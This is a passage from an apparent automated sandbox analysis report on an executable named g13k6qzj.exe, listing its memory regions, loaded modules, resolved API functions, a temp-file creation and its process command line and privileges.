| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00290000 | 0x002b9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x01e5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01f3ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:38 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #223: g13k6qzj.exe
177
0
| Information | Value |
|---|---|
| ID | #223 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:28, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc50 |
| Parent PID | 0x430 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C90
0x
CBC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00817fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x01daffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
